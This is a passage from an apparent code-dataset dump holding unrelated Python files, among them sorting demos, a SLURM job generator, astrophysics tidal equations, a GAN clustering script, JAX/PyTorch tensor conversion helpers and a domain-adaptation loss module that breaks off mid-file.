[54,26,93,17,77,31,44,55,20]\nquickSort(alist)\nprint(alist)\n\nalist = [54,26,93,17,77,31,44,55,20]\nmergeSort(alist)\nprint(alist)\n\nalist = [54,26,93,17,77,31,44,55,20]\ninsertionSort(alist)\nprint(alist)\n\nalist = 
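# added style note on the sorting record above: each three-line temp swap can
# be a tuple assignment (alist[i], alist[j] = alist[j], alist[i]) without
# changing behaviour; selectionSort compresses to this equivalent sketch:
def selection_sort(a):
    # hypothetical compact variant, still O(n^2)
    for end in range(len(a) - 1, 0, -1):
        i = max(range(end + 1), key=a.__getitem__)
        a[end], a[i] = a[i], a[end]

xs = [54, 26, 93, 17, 77]
selection_sort(xs)
assert xs == [17, 26, 54, 77, 93]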
[54,26,93,17,77,31,44,55,20]\nselectionSort(alist)\nprint(alist)\n\n","sub_path":"python/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"440524519","text":"import numpy as np\n\nclass LinearController:\n \"\"\"A linear controller u = A x + b (b is optional)\"\"\"\n def __init__(self,A,b=None):\n self.A = A\n self.b = b\n\n def __eval__(self,x):\n res = np.dot(self.A,x)\n if self.b:\n res += self.b\n return res\n \n","sub_path":"Archived/Research/MotionPrimitives/Generation/optimization/control/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"380474382","text":"import random\nimport time\n\n#number of readings in stream to be sent to console \nno_of_readings_in_stream = 10\n\n#BatteryParameterRange = parameter_name : [lowerLimit,upperLimit]\nBattery_parameters_range= {'temperature':[0,45], 'soc':[20,80]}\n\n#geneerate single random reading between limits\ndef generate_param_reading(param):\n param_range= Battery_parameters_range[param]\n return (round(random.uniform(param_range[0], param_range[1]),2))\n\n#generate stream of readings between limits\ndef generate_param_stream(reading_count):\n [temp_stream,soc_stream]=[[],[]]\n for i in range(0,reading_count):\n temp_stream.append(generate_param_reading('temperature'))\n soc_stream.append(generate_param_reading('soc'))\n return ([temp_stream,soc_stream])\n\n#output to console the stream of readings\ndef stream_output(reading_count):\n #to test no. of readings\n count_readings=0\n end_of_stream=False\n [temp_stream,soc_stream]=generate_param_stream(reading_count)\n for i in range(0,reading_count):\n print(temp_stream[i],',',soc_stream[i])\n time.sleep(1)\n count_readings=count_readings+1\n \n #to test end of display\n if i==reading_count-1:\n end_of_stream=True\n return([end_of_stream,count_readings])\n\nstream_output(no_of_readings_in_stream)\n","sub_path":"generate_stream.py","file_name":"generate_stream.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"121754500","text":"\"\"\"\n script for making separate jobs and running on batch system.\n\n# job-i.sh contains executable commands; pre-job-i.sh moves to the job-i folder and copies files if necessary!\n\n\"\"\"\n\nfrom sys import argv, exit\nfrom os import makedirs, path, unlink\nfrom shutil import copytree, copy, rmtree\nimport subprocess\nimport os\nimport json\n\ndef split(a, n):\n k, m = divmod(len(a), n)\n return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in xrange(n))\n\n\n####################################\n\ntry:\n # set parameters\n numberOfFiles = int(argv[1])\n numberOfJobs = int(argv[2])\n\nexcept:\n print('Didnt set number of files or jobs!')\n exit()\n\n\n#####################################\n\nCONF = json.load(open(\"Configure.json\", \"r\"))\nWORKING_FOLDER = CONF[\"workingFolder\"]\nSOURCE_ROOT = CONF[\"sourceRoot\"]\nJobsFolder = \"JOBS\"\n\n\nif not os.path.exists(JobsFolder):\n os.makedirs(JobsFolder)\n \n\nIntervals = list(split( range(1, numberOfFiles+1), numberOfJobs))\nCorrectedNumberOfJobs = len(Intervals)\n\nmin_index, max_index = '', ''\n\nfor i in range(1, CorrectedNumberOfJobs+1):\n\n #arguments = {'wf': WORKING_FOLDER, 'jb': JobsFolder, 'minI': min_index, 'maxI': max_index, 'sr': 
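# added note on the LinearController record above: __eval__ is not a Python
# special method, so instances are never callable (__call__ is presumably
# intended), and `if self.b:` raises ValueError for numpy arrays. Hedged
# corrected sketch:
import numpy as np

class LinearControllerFixed:
    """u = A x + b (b optional) - hypothetical corrected variant."""
    def __init__(self, A, b=None):
        self.A, self.b = A, b

    def __call__(self, x):
        res = np.dot(self.A, x)
        if self.b is not None:
            res = res + self.b
        return res

assert np.allclose(LinearControllerFixed(np.eye(2), np.ones(2))(np.zeros(2)), 1.0)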
SOURCE_ROOT}\n job_folder='job'+'-'+str(i) \n j = '%j'\n N = '%N'\n min_index = Intervals[i-1][0] \n max_index = Intervals[i-1][-1] \n #print min_index, max_index\n\n open(path.join(JobsFolder, \"job-%d.sh\" % i), \"w\").write(\n\"\"\"#!/bin/bash\n\n# Task name\n#SBATCH -J doMacros\n\n# Run time limit\n#SBATCH --time=0-1:60:00\n\n# Working directory on shared storage\n#SBATCH -D %(wf)s/interpolation/JOBS/%(jb)s\n\n# Standard and error output in different files\n#SBATCH -o %(j)s_%(N)s.out.log\n#SBATCH -e %(j)s_%(N)s.err.log\n\n%(sr)s\nmodule use /cvmfs/it.gsi.de/modulefiles/\nmodule load /cvmfs/it.gsi.de/modulefiles/compiler/gcc/6.3.0\ntime python do_macros_2030.py %(minI)s %(maxI)s '%(jb)s' \n\nrm %(wf)s/interpolation/JOBS/%(jb)s/*/{eval_fit_graph_spectra_*,fit_graph_spectra_*,graph_spectra_*,chi_*}\n\n\n\"\"\" % {'wf': WORKING_FOLDER, 'jb': job_folder , 'minI': min_index, 'maxI': max_index, 'sr': SOURCE_ROOT, 'j': j, 'N': N} \n\n\n )\n\nfor i in range(1, CorrectedNumberOfJobs+1):\n\n job_folder='job'+'-'+str(i)\n\n open(path.join(JobsFolder, \"pre-job-%d.sh\" % i), \"w\").write(\n\n\"\"\"#!/bin/bash\nmkdir %s\ncd %s\nmkdir -p pion\nmkdir -p kaon\nmkdir -p proton\nscp ../../do_macros_2030.py ./\nscp ../../Configure.json ./\ncd ..\n\n\"\"\" % (job_folder, job_folder)\n\n )\n\n\nopen(path.join(JobsFolder, \"merge_root_files.sh\"), \"w\").write(\n\n\"\"\"#!/bin/bash\n\nls -1v %(wf)s/interpolation/JOBS/job-*/pion/tree* > listPion.txt\nls -1v %(wf)s/interpolation/JOBS/job-*/kaon/tree* > listKaon.txt\nls -1v %(wf)s/interpolation/JOBS/job-*/proton/tree* > listProton.txt\n\nhadd PionFull.root @listPion.txt\nhadd KaonFull.root @listKaon.txt\nhadd ProtonFull.root @listProton.txt\n\n\n\"\"\" % {'wf': WORKING_FOLDER}\n\n)\n","sub_path":"RunGrid-Cent2030/interpolation/makeJobs_2030.py","file_name":"makeJobs_2030.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135933487","text":"from astropy.io import fits\nimport pandas as pd\nimport glob\nimport os\nimport numpy as np\n\ndef flux_to_lum(flux, distance):\n \"\"\"Distance should be in parsecs, flux in erg cm^-2 sec^-1\"\"\"\n dist_in_cm = 3.086*10**18.0 * distance # cm\n lum = np.multiply(flux, 4 * np.pi * np.power(dist_in_cm, 2.0))\n return lum\n\ndef planet_flux(luminosity, distance):\n \"\"\"Distance should be in AU, luminosity in erg sec^-1\"\"\"\n dist_in_cm = (6.685*10**(-14.))**-1.0 * distance # cm /au * cm3.086*10**18.0 * distance # cm\n flux_on_planet = np.true_divide(luminosity, np.multiply(4 * np.pi, np.power(dist_in_cm, 2.0)))\n return flux_on_planet\n\n\ndef tidal_evo(y, t, Q, r, per, dmdtval):\n \"\"\"Units: earth masses, years, AU\n \"\"\"\n k = 0.3 # some constant in tidal equations (love number) - doesn't matter if we plot everything in terms of Q' in the end\n G = 0.000118413597733711048158640226628895184135977337110481586 # (*AU^3/(earth mass*year^2),\n # which is G in these weird units*)\n\n mstar = 27000.0 # mass of trappist-1 star, in earth masses\n rstar = 5.627e-4 # radius of trappist-1 star, in AU\n # also all angles must be in radians\n a,e,m = y\n signval = np.sign(2 * (2*np.pi / 3.3) - 3*(2*np.pi / per))\n qprime_p = Q / ((2/3.) * k)\n qprime_s = 1e5 / ((2/3.) * k) # https://iopscience.iop.org/article/10.3847/1538-4357/aad40e/pdf\n\n dadt = (signval * 9./2. * np.sqrt(G/ mstar) * np.power(rstar, 5.) * m * np.power(qprime_s, -1.) - 63./2. 
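# added portability note on the makeJobs record above: split() uses xrange, so
# the script targets Python 2; under Python 3 replace xrange with range. An
# equivalent sketch of the chunking:
def split_chunks(a, n):
    # n contiguous chunks whose sizes differ by at most one
    k, m = divmod(len(a), n)
    return (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))

assert [list(c) for c in split_chunks(range(1, 8), 3)] == [[1, 2, 3], [4, 5], [6, 7]]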
* np.multiply(qprime_p, m)**-1*np.sqrt(G * mstar**3.0) *np.power(r,5.0) * np.power(e, 2.0)) * np.power(a, -11/2.) \n dedt = (signval * 171./16. * np.sqrt(G/ mstar) * np.power(rstar, 5.) * m * np.power(qprime_s, -1.) - 63./4. * np.multiply(qprime_p, m)**-1*np.sqrt((G * mstar**3.0)) *(r)**5.0) * np.power(a, -13/2.) * e\n #drdt = -1e-18 / (4.0 * np.pi * r**2.) # dm/dt / (4 pi r^2) = dr/dt\n dmdt = -1 * dmdtval\n dydt = np.asarray([dadt, dedt, dmdt])\n return dydt","sub_path":".ipynb_checkpoints/trappist_machine-checkpoint.py","file_name":"trappist_machine-checkpoint.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"547666780","text":"\nfrom __future__ import print_function\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\n\nimport argparse\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport numpy as np\nimport os\n\n\n#coherent_array must be 5*5\ndef cout_auc_5(coherent_array):\n \n Accuracy =[]\n Position=[]\n\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[1][j]+coherent_array[2][m]+coherent_array[3][a]+coherent_array[3][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[1][j]+coherent_array[3][m]+coherent_array[2][a]+coherent_array[2][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[3][j]+coherent_array[2][m]+coherent_array[1][a]+coherent_array[1][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n for i in range(0,5):\n for j in range(0,5):\n for m in range(0,5):\n lis=[0,1,2,3,4]\n if i!=j and i!=m and m!=j:\n lis.remove(i)\n lis.remove(j)\n lis.remove(m)\n a=lis[0]\n b=lis[1]\n accuracy = float(coherent_array[0][i]+coherent_array[3][j]+coherent_array[2][m]+coherent_array[0][a]+coherent_array[0][b])/coherent_array.sum()\n position = [i,j,m,a,b]\n Accuracy.append(accuracy)\n Position.append(position)\n auc = max(Accuracy)\n p=Accuracy.index(auc)\n pos = Position[p]\n print(auc)\n \n \ndef clustering5(paramsG,paramsD,paramsDD,paramsDQ):\n root_dir = '/disk1/labeled/'\n npyList = os.listdir(root_dir)\n npyList = [root_dir+n for n in npyList]\n result = []\n label = []\n for n,array in enumerate(npyList):\n result.append(np.load(array))\n label.append([n]*result[n].shape[0])\n\n result = np.concatenate(result)\n label = np.concatenate(label)\n\n X = np.asarray([x.transpose((2,0,1)) for x in result])\n 
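# added integration sketch: tidal_evo above follows the func(y, t, *args)
# convention of scipy.integrate.odeint, i.e. it would be driven as
# odeint(tidal_evo, y0, t, args=(Q, r, per, dmdtval)). A self-contained
# stand-in with the same calling shape (toy exponential decay):
import numpy as np
from scipy.integrate import odeint

def decay(y, t, k):
    return -k * np.asarray(y)

sol = odeint(decay, [1.0], np.linspace(0.0, 1.0, 11), args=(2.0,))
assert np.isclose(sol[-1, 0], np.exp(-2.0), rtol=1e-3)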
X = X.astype(np.float32)/(255.0/2) - 1.0\n X_train = torch.FloatTensor(X)\n X_label = torch.LongTensor(label)\n train = torch.utils.data.TensorDataset(X_train,X_label)\n train_loader = torch.utils.data.DataLoader(train, shuffle=False, batch_size=1)\n \n rand=128\n dis=1\n dis_category = 5\n\n class avgpool(nn.Module):\n def __init__(self, up_size=0):\n super(avgpool, self).__init__()\n\n def forward(self, x):\n out_man = (x[:,:,::2,::2] + x[:,:,1::2,::2] + x[:,:,::2,1::2] + x[:,:,1::2,1::2]) / 4\n return out_man\n\n class ResidualBlock(nn.Module):\n\n def __init__(self, in_dim, out_dim, resample=None, up_size=0):\n super(ResidualBlock, self).__init__()\n\n if resample == 'up':\n self.bn1 = nn.BatchNorm2d(in_dim)\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.upsample = torch.nn.Upsample(up_size,2)\n self.upsample_conv = nn.Conv2d(in_dim, out_dim, 1, 1, 0, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n self.bn2 = nn.BatchNorm2d(out_dim)\n\n elif resample == 'down':\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n self.pool = avgpool()\n self.pool_conv = nn.Conv2d(in_dim, out_dim, 1, 1, 0, bias=True)\n\n elif resample == None:\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n\n self.resample = resample\n\n def forward(self, x):\n\n if self.resample == None:\n shortcut = x\n output = x\n\n output = nn.functional.relu(output)\n output = self.conv1(output)\n output = nn.functional.relu(output)\n output = self.conv2(output)\n\n elif self.resample == 'up':\n shortcut = x\n output = x\n\n shortcut = self.upsample(shortcut) #upsampleconv\n shortcut = self.upsample_conv(shortcut)\n\n output = self.bn1(output)\n output = nn.functional.relu(output)\n output = self.conv1(output)\n\n output = self.bn2(output)\n output = nn.functional.relu(output)\n output = self.upsample(output) #upsampleconv\n output = self.conv2(output)\n\n elif self.resample == 'down':\n shortcut = x\n output = x\n\n shortcut = self.pool_conv(shortcut) #convmeanpool\n shortcut = self.pool(shortcut)\n\n output = nn.functional.relu(output)\n output = self.conv1(output)\n\n output = nn.functional.relu(output)\n output = self.conv2(output) #convmeanpool\n output = self.pool(output)\n\n return output+shortcut\n\n class ResidualBlock_thefirstone(nn.Module):\n\n def __init__(self, in_dim, out_dim, resample=None, up_size=0):\n super(ResidualBlock_thefirstone, self).__init__()\n\n self.conv1 = nn.Conv2d(in_dim, out_dim, 3, 1, 1, bias=True)\n self.conv2 = nn.Conv2d(out_dim, out_dim, 3, 1, 1, bias=True)\n self.pool = avgpool()\n self.pool_conv = nn.Conv2d(in_dim, out_dim, 1, 1, 0, bias=True)\n\n def forward(self, x):\n\n shortcut = x\n output = x\n\n shortcut = self.pool(shortcut) #meanpoolconv\n shortcut = self.pool_conv(shortcut)\n\n output = self.conv1(output)\n output = nn.functional.relu(output)\n output = self.conv2(output) #convmeanpool\n output = self.pool(output)\n\n return output+shortcut\n\n\n class generator(nn.Module):\n\n def __init__(self, rand=128):\n super(generator, self).__init__()\n self.rand = rand\n self.linear = nn.Linear(rand ,2048, bias=True)\n self.layer_up_1 = ResidualBlock(128, 128, 'up', up_size=8)\n self.layer_up_2 = ResidualBlock(128, 128, 'up', up_size=16)\n self.layer_up_3 = ResidualBlock(128, 128, 'up', up_size=32)\n self.bn1 = nn.BatchNorm2d(128)\n self.conv_last = nn.Conv2d(128, 3, 3, 1, 1, bias=True)\n\n 
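# added note on ResidualBlock above: torch.nn.Upsample(up_size, 2) passes both
# size and scale_factor positionally, which F.interpolate rejects at forward
# time ("only one of size or scale_factor should be defined"); one of the two
# suffices, e.g.
#     self.upsample = torch.nn.Upsample(scale_factor=2)
# Likewise nn.functional.tanh in the generator is deprecated in recent
# PyTorch in favour of torch.tanh.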
def forward(self, x):\n x = x.view(-1,self.rand)\n x = self.linear(x)\n x = x.view(-1,128,4,4)\n x = self.layer_up_1(x)\n x = self.layer_up_2(x)\n x = self.layer_up_3(x)\n x = self.bn1(x)\n x = nn.functional.relu(x)\n x = self.conv_last(x)\n x = nn.functional.tanh(x)\n return x\n\n netG = generator(rand = rand+dis*dis_category)\n\n class discriminator(nn.Module):\n\n def __init__(self):\n super(discriminator, self).__init__()\n self.layer_down_1 = ResidualBlock_thefirstone(3, 128)\n self.layer_down_2 = ResidualBlock(128, 128, 'down')\n self.layer_none_1 = ResidualBlock(128, 128, None)\n self.layer_none_2 = ResidualBlock(128, 128, None)\n #self.mean_pool = nn.AvgPool2d(8,1,0)\n #self.linear = nn.Linear(128,1, bias=True)\n #self.linear2 = nn.Linear(128,10, bias=True)\n\n def forward(self, x):\n x = self.layer_down_1(x)\n x = self.layer_down_2(x)\n x = self.layer_none_1(x)\n x = self.layer_none_2(x)\n #x = self.mean_pool(x)\n x = nn.functional.relu(x)\n x = x.mean(2).mean(2)\n x = x.view(-1, 128)\n\n #shortcut = x\n #output = x\n\n #output = self.linear(output)\n #shortcut= self.linear2(shortcut)\n\n #return output.view(-1,1,1,1), shortcut.view(-1,10,1,1)\n return x\n\n netD = discriminator()\n\n#torch.cuda.set_device(1)\n\n class _netD_D(nn.Module):\n def __init__(self):\n super(_netD_D, self).__init__()\n self.linear = nn.Linear(128,1, bias=True)\n #self.conv = nn.Conv2d(4096, 1, 1, 1, 0, bias=True)\n\n def forward(self, x):\n x = self.linear(x)\n return x.view(-1,1,1,1)\n\n class _netD_Q(nn.Module):\n def __init__(self, nd = 10):\n super(_netD_Q, self).__init__()\n # input is Z, going into a convolution\n #self.conv = nn.Conv2d(4096, 128, 1, 1, 0, bias=True)\n #self.relu = nn.LeakyReLU(0.2, inplace=True)\n #self.conv2 = nn.Conv2d(128, nd, 1, 1, 0, bias=True)\n self.softmax = nn.LogSoftmax()\n #self.linear1 = nn.Linear(4096,128, bias=True)\n #self.relu = nn.LeakyReLU(0.2, inplace=True)\n self.linear2 = nn.Linear(128,nd, bias=True)\n self.nd = nd\n\n def forward(self, x):\n #x = self.linear1(x)\n #x = self.relu(x)\n x = self.linear2(x)\n x = self.softmax(x)\n # x = x.view(64,10)\n return x.view(-1,self.nd,1,1)\n\n netD_D = _netD_D()\n netD_Q = _netD_Q(dis_category)\n \n\n netG.load_state_dict(torch.load(paramsG))\n netD.load_state_dict(torch.load(paramsD))\n netD_D.load_state_dict(torch.load(paramsDD))\n netD_Q.load_state_dict(torch.load(paramsDQ))\n \n data_iter = iter(train_loader)\n predict = []\n netD = netD.cuda()\n netD_Q = netD_Q.cuda()\n\n for iteration in data_iter:\n img, img_label = iteration\n predict_label = netD_Q(netD(Variable(img.cuda())))\n predict.append(predict_label.data.cpu().numpy()) \n \n predict_label = []\n\n for n in range(0, len(predict)):\n predict_label.append(np.argmax(predict[n]))\n\n coherent_array = np.zeros((5,5),dtype=int)\n\n for n in range(0, len(predict)):\n coherent_array[label[n],predict_label[n]] +=1\n \n cout_auc_5(coherent_array)\n print (coherent_array)\n \n\n\n","sub_path":"0722/clustering_0805.py","file_name":"clustering_0805.py","file_ext":"py","file_size_in_byte":11737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"434513535","text":"# Glen Paul Florendo\n# COMPTNG16\n# October 11, 2017\n\nloremIpsumText = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. 
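# hedged alternative (added, invented counts): cout_auc_5 above brute-forces a
# cluster-to-class matching with nested loops (and can count a row twice); the
# standard bijective matching for a confusion matrix is the Hungarian
# algorithm:
import numpy as np
from scipy.optimize import linear_sum_assignment

conf = np.array([[30, 2, 1, 0, 0],
                 [1, 25, 3, 1, 0],
                 [0, 2, 28, 0, 0],
                 [0, 0, 1, 27, 2],
                 [1, 0, 0, 2, 26]])
rows, cols = linear_sum_assignment(-conf)   # negate to maximise matched mass
accuracy = conf[rows, cols].sum() / conf.sum()
assert 0.0 < accuracy <= 1.0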
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"\nloremIpsumList = loremIpsumText.split()\n\n# Task 1\nloremIpsumDict = {w: loremIpsumList.count(w) for w in loremIpsumList}\n\n# Task 2\nloremIpsumUniqCount = len(loremIpsumDict)\n\n# Task 3\ndef uniq(textList=[]):\n if len(textList) == 0: # if empty list\n return None\n\n uniqDict = {}\n\n for word in textList:\n if word not in uniqDict:\n uniqDict[word] = 1\n else: # word is in uniqDict\n uniqDict[word] = uniqDict.get(word) + 1\n return uniqDict\n\n\n# Task 4\ntmaasFile = open('agatha christie-tmaas.txt', 'r')\ntmaasText = str(tmaasFile.read())\ntmaasFile.close()\ntmaasList = tmaasText.split()\ntmaasDict = uniq(tmaasList)\n\n","sub_path":"uniq.py","file_name":"uniq.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"558695596","text":"\"\"\" Generic functions to convert Jax DeviceArrays into PyTorch Tensors and vice-versa.\n\"\"\"\nimport warnings\nfrom collections import abc\nfrom functools import singledispatch\nfrom typing import Any, Union, Dict\n\nfrom jax._src import dlpack as jax_dlpack\nfrom jaxlib.xla_extension import DeviceArray\n\ntry:\n import torch\nexcept ImportError:\n warnings.warn(\n \"brax.io.torch requires PyTorch. Please run `pip install torch` to use \"\n \"functions from this module.\"\n )\n raise\n\nfrom torch import Tensor\nfrom torch.utils import dlpack as torch_dlpack\nDevice = Union[str, torch.device]\n\n\n@singledispatch\ndef torch_to_jax(value: Any) -> Any:\n \"\"\"Converts values to JAX tensors.\"\"\"\n # Don't do anything by default, and when a handler is registered for this type of\n # value, it gets used to convert it to a Jax DeviceArray.\n # NOTE: The alternative would be to raise an error when an unsupported value is\n # encountered:\n # raise NotImplementedError(f\"Don't know how to convert {v} to a Jax tensor\")\n return value\n\n\n@torch_to_jax.register(Tensor)\ndef _tensor_to_jax(value: Tensor) -> DeviceArray:\n \"\"\"Converts a PyTorch Tensor into a Jax DeviceArray.\"\"\"\n tensor = torch_dlpack.to_dlpack(value)\n tensor = jax_dlpack.from_dlpack(tensor)\n return tensor\n\n\n@torch_to_jax.register(abc.Mapping)\ndef _torch_dict_to_jax(\n value: Dict[str, Union[Tensor, Any]]\n) -> Dict[str, Union[DeviceArray, Any]]:\n \"\"\"Converts a dict of PyTorch tensors into a dict of Jax DeviceArrays.\"\"\"\n return type(value)(**{k: torch_to_jax(v) for k, v in value.items()})\n\n\n@singledispatch\ndef jax_to_torch(value: Any, device: Device = None) -> Any:\n \"\"\"Convert JAX values to PyTorch Tensors.\n\n By default, the returned tensors are on the same device as the Jax inputs, but if\n `device` is passed, the tensors will be moved to that device.\n \"\"\"\n # Don't do anything by default, and when a handler is registered for this type of\n # value, it gets used to convert it to a torch tensor.\n # NOTE: The alternative would be to raise an error when an unsupported value is\n # encountered:\n # raise NotImplementedError(f\"Don't know how to convert {v} to a Torch tensor\")\n return value\n\n\n@jax_to_torch.register(DeviceArray)\ndef _devicearray_to_tensor(value: DeviceArray, device: Device = None) -> Tensor:\n \"\"\"Converts a Jax DeviceArray into PyTorch Tensor.\"\"\"\n dpack = jax_dlpack.to_dlpack(value)\n tensor = 
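# added note on the uniq record above: the stdlib equivalent of both Task 1
# and uniq() is collections.Counter:
from collections import Counter

words = 'lorem ipsum dolor sit amet lorem'.split()
assert Counter(words)['lorem'] == 2 and Counter([]) == {}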
torch_dlpack.from_dlpack(dpack)\n if device:\n return tensor.to(device=device)\n return tensor\n\n\n@jax_to_torch.register(abc.Mapping)\ndef _jax_dict_to_torch(\n value: Dict[str, Union[DeviceArray, Any]], device: Device = None\n) -> Dict[str, Union[Tensor, Any]]:\n \"\"\"Converts a dict of Jax DeviceArrays into a dict of PyTorch tensors.\"\"\"\n return type(value)(**{k: jax_to_torch(v, device=device) for k, v in value.items()})\n","sub_path":"brax/io/torch.py","file_name":"torch.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"7281973","text":"import numpy as np\nimport torch\nimport configs.dann_config as dann_config\n\n\n# call loss_DANN instead of this function\ndef _loss_DANN(\n class_predictions_logits,\n logprobs_target,\n instances_labels,\n is_target,\n domain_loss_weight,\n prediction_loss_weight,\n unk_value=dann_config.UNK_VALUE,\n):\n \"\"\"\n :param class_predictions_logits: Tensor, shape = (batch_size, n_classes).\n Raw (NO logsoftmax).\n :param logprobs_target: Tensor, shape = (batch_size,):\n logprobs that domain is target.\n :param instances_labels: np.Array, shape = (batch_size,)\n :param is_target: np.Array, shape = (batch_size,)\n :param domain_loss_weight: weight of domain loss\n :param prediction_loss_weight: weight of prediction loss\n :param unk_value: value that means that true label is unknown\n \"\"\"\n instances_labels = torch.Tensor(instances_labels).long()\n is_target = torch.Tensor(is_target).float()\n\n crossentropy = torch.nn.CrossEntropyLoss(ignore_index=unk_value)\n prediction_loss = crossentropy(class_predictions_logits, instances_labels)\n binary_crossentropy = torch.nn.BCEWithLogitsLoss()\n domain_loss = binary_crossentropy(logprobs_target, is_target)\n loss = domain_loss_weight * domain_loss \\\n + prediction_loss_weight * prediction_loss\n return loss\n\n\n# call loss_DANN instead of this function\ndef _loss_DANN_splitted(\n class_logits_on_src,\n class_logits_on_trg,\n logprobs_target_on_src,\n logprobs_target_on_trg,\n true_labels_on_src,\n true_labels_on_trg,\n domain_loss_weight,\n prediction_loss_weight,\n unk_value=dann_config.UNK_VALUE,\n):\n \"\"\"\n :param class_logits_on_src: Tensor, shape = (batch_size, n_classes).\n :param class_logits_on_trg: Tensor, shape = (batch_size, n_classes).\n :param logprobs_target_on_src: Tensor, shape = (batch_size,):\n :param logprobs_target_on_trg: Tensor, shape = (batch_size,):\n :param true_labels_on_src: np.Array, shape = (batch_size,)\n :param true_labels_on_trg: np.Array, shape = (batch_size,)\n :param domain_loss_weight: weight of domain loss\n :param prediction_loss_weight: weight of prediction loss\n :param unk_value: value that means that true class label is unknown\n \"\"\"\n # TARGET_DOMAIN_IDX is 1\n source_len = len(class_logits_on_src)\n target_len = len(class_logits_on_trg)\n true_labels_on_src = torch.as_tensor(true_labels_on_src).long()\n true_labels_on_trg = torch.as_tensor(true_labels_on_trg).long()\n is_target_on_src = torch.zeros(source_len, dtype=torch.float)\n is_target_on_trg = torch.ones(target_len, dtype=torch.float)\n\n crossentropy = torch.nn.CrossEntropyLoss(ignore_index=unk_value, reduction='sum')\n prediction_loss_on_src = crossentropy(class_logits_on_src, true_labels_on_src)\n prediction_loss_on_trg = crossentropy(class_logits_on_trg, true_labels_on_trg)\n n_known = (true_labels_on_src != unk_value).sum() + \\\n (true_labels_on_trg != unk_value).sum()\n prediction_loss = 
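# hedged round-trip sketch (added): jax_to_torch/torch_to_jax above convert
# zero-copy through DLPack; assuming jax and torch are importable and the two
# functions are in scope:
import jax.numpy as jnp

t = jax_to_torch(jnp.arange(3.0))   # DeviceArray -> torch.Tensor
assert torch_to_jax(t).shape == (3,)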
(prediction_loss_on_src + prediction_loss_on_trg) / n_known\n\n binary_crossentropy = torch.nn.BCEWithLogitsLoss(reduction='sum')\n domain_loss_on_src = binary_crossentropy(logprobs_target_on_src, is_target_on_src)\n domain_loss_on_trg = binary_crossentropy(logprobs_target_on_trg, is_target_on_trg)\n domain_loss = (domain_loss_on_src + domain_loss_on_trg) / (source_len + target_len)\n loss = domain_loss_weight * domain_loss \\\n + prediction_loss_weight * prediction_loss\n return loss, {\n \"domain_loss_on_src\": domain_loss_on_src,\n \"domain_loss_on_trg\": domain_loss_on_trg,\n \"domain_loss\": domain_loss,\n \"prediction_loss_on_src\": prediction_loss_on_src,\n \"prediction_loss_on_trg\": prediction_loss_on_trg,\n \"prediction_loss\": prediction_loss\n }\n\n\ndef calc_domain_loss_weight(current_iteration,\n total_iterations,\n gamma=dann_config.LOSS_GAMMA):\n progress = current_iteration / total_iterations\n lambda_p = 2 / (1 + np.exp(-gamma * progress))\n return lambda_p\n\n\ndef calc_prediction_loss_weight(current_iteration, total_iterations):\n return 1\n\n\ndef loss_DANN(model,\n batch,\n epoch,\n n_epochs):\n \"\"\"\n :param model: model.forward(images) should return dict with 